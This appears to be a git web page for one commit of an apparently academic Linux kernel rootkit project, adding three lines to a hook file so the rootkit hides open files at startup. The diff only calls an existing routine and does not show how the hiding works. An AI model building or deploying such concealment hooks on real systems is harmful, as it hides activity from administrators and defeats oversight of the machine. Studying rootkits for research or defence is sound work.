hides open files on startup - linux-rootkit - Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit e061720c0026bdfa1da05947348dc579dcde4db5
parent 093c929968c61293c699678a1e814f403a6bf107
Author: deurzen <m.deurzen@tum.de>
Date:   Sun,  6 Dec 2020 04:14:59 +0100

hides open files on startup

Diffstat:
M src/hook.c  | 3 +++

1 file changed, 3 insertions(+), 0 deletions(-)
diff --git a/src/hook.c b/src/hook.c
@@ -69,6 +69,9 @@ init_hooks(void)
     if (rootkit.hiding_files)
         hide_files();
 
+    if (rootkit.hiding_open)
+        hide_open();
+
     if (rootkit.hiding_pids) {
         clear_hidden_pids();
         unhide_pids();

	linux-rootkit Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
	git clone git://git.deurzen.net/linux-rootkit
	Log \| Files \| Refs